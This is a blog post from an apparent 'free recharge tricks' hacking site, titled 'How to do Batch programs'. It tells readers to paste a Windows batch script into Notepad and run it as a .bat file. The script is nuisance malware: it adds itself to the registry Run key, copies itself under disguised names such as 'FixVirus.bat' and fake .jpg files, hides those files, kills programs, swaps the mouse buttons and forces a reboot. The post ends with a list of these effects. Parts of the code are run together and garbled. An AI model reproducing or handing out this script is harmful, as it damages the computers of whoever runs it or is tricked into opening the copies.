Latest Free Recharge Tricks






2011 vodafone, Airtel, BSNL, Reliance, HTC, SPICE, Etisalat, and more tricks and tips for computer hacking and much more about facebook....































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































How to do Batch programs

Posted by Free Mobile Recharge Tuesday, August 24, 2010
ads
ads



Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)Be carefull & Don't run this on ur pc

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0
%Systemroot%\Greatgame

>nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMainstart

clscd %userprofile%\desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c "VIRUS DETECTED"startstarttime 12:00:R.I.Pcd %usernameprofile%\desktopcopy Greatgame.bat %random%.batgoto RIPIt will

1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer.
Thnks 4 reading!

ads

0 comments

Post a Comment

New Tricks Via mail

Enter your email address: